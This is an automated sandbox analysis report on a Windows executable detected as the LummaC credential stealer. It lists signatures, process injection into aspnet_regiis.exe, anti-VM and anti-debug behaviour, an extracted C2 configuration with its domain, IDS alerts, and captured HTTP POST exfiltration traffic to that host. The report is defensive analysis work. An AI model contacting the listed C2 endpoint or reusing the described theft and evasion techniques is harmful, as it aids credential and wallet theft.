Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561487
MD5:e7aa83909ace3906ec75144cc33e024c
SHA1:333ee9d7f4c683d8e0ed05bdadfbd2baade379e3
SHA256:24443cd457177eeed9c584e5d5ad194303fd94269fdb0d72e0db598215a5c826
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E7AA83909ACE3906EC75144CC33E024C)
    • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 2196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • WerFault.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": "https://disobey-curly.sbs/api", "Build Version": "H8NgCl--lonikir"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000003.1799079639.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 7132JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Process Memory Space: aspnet_regiis.exe PID: 2196JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: aspnet_regiis.exe PID: 2196JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T14:59:50.863041+010020283713Unknown Traffic192.168.2.449730172.67.223.140443TCP
            2024-11-23T14:59:53.122240+010020283713Unknown Traffic192.168.2.449732172.67.223.140443TCP
            2024-11-23T14:59:55.416705+010020283713Unknown Traffic192.168.2.449734172.67.223.140443TCP
            2024-11-23T14:59:57.908705+010020283713Unknown Traffic192.168.2.449737172.67.223.140443TCP
            2024-11-23T15:00:00.236881+010020283713Unknown Traffic192.168.2.449739172.67.223.140443TCP
            2024-11-23T15:00:02.720212+010020283713Unknown Traffic192.168.2.449741172.67.223.140443TCP
            2024-11-23T15:00:05.070021+010020283713Unknown Traffic192.168.2.449742172.67.223.140443TCP
            2024-11-23T15:00:09.634403+010020283713Unknown Traffic192.168.2.449744172.67.223.140443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T14:59:51.810637+010020546531A Network Trojan was detected192.168.2.449730172.67.223.140443TCP
            2024-11-23T14:59:53.825426+010020546531A Network Trojan was detected192.168.2.449732172.67.223.140443TCP
            2024-11-23T15:00:10.352806+010020546531A Network Trojan was detected192.168.2.449744172.67.223.140443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T14:59:51.810637+010020498361A Network Trojan was detected192.168.2.449730172.67.223.140443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T14:59:53.825426+010020498121A Network Trojan was detected192.168.2.449732172.67.223.140443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T14:59:58.742675+010020480941Malware Command and Control Activity Detected192.168.2.449737172.67.223.140443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: aspnet_regiis.exe.2196.2.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://disobey-curly.sbs/api", "Build Version": "H8NgCl--lonikir"}
            Source: file.exeReversingLabs: Detection: 26%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
            Source: file.exeJoe Sandbox ML: detected
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49744 version: TLS 1.2
            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: %%.pdb source: file.exe, 00000000.00000002.2350885780.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, WER4C58.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Desktop\file.PDB source: file.exe, 00000000.00000002.2350885780.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Desktop\file.PDB source: file.exe, 00000000.00000002.2350943635.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WER4C58.tmp.dmp.5.dr
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: file.exe, 00000000.00000002.2350885780.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER4C58.tmp.dmp.5.dr
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [edi]0_2_0061D8D0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_006332A0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_006182B0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax0_2_00633320
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_00633320
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h0_2_00633720

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.223.140:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.223.140:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 172.67.223.140:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.223.140:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49737 -> 172.67.223.140:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 172.67.223.140:443
            Source: Malware configuration extractorURLs: https://disobey-curly.sbs/api
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.223.140:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.223.140:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.223.140:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.223.140:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.223.140:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.223.140:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.223.140:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.223.140:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: disobey-curly.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: disobey-curly.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PN69PVY0VSG3MGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18147Host: disobey-curly.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R8OZ1M0FCCDE4CGU3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8780Host: disobey-curly.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4W6Y6DDOCXYZ0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20409Host: disobey-curly.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XUYYFZQQQCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1225Host: disobey-curly.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H7HA15TN2DGIA4Z42User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568214Host: disobey-curly.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: disobey-curly.sbs
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: disobey-curly.sbs
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: disobey-curly.sbs
            Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
            Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
            Source: aspnet_regiis.exe, 00000002.00000003.1796754164.0000000004F6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
            Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: aspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1797517806.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://disobey-curly.sbs/
            Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000003.1819973696.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1823663645.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1889237292.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2003490990.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725528759.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1836515078.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2003490990.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2003656590.0000000002C92000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disobey-curly.sbs/api
            Source: aspnet_regiis.exe, 00000002.00000002.2003656590.0000000002C92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disobey-curly.sbs/api.
            Source: aspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disobey-curly.sbs/apiI
            Source: aspnet_regiis.exe, 00000002.00000003.1836515078.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disobey-curly.sbs/apiu
            Source: aspnet_regiis.exe, 00000002.00000003.1819973696.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1823663645.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disobey-curly.sbs/u
            Source: aspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disobey-curly.sbs/z
            Source: aspnet_regiis.exe, 00000002.00000002.2003619928.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1820026079.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disobey-curly.sbs:443/api
            Source: aspnet_regiis.exe, 00000002.00000003.1889111505.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002C63000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1889212884.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2003619928.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disobey-curly.sbs:443/apiO
            Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: aspnet_regiis.exe, 00000002.00000003.1726503626.0000000005005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1750336942.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1749313377.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726686158.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726503626.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1750336942.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1749313377.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726686158.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726503626.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: aspnet_regiis.exe, 00000002.00000003.1796754164.0000000004F6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
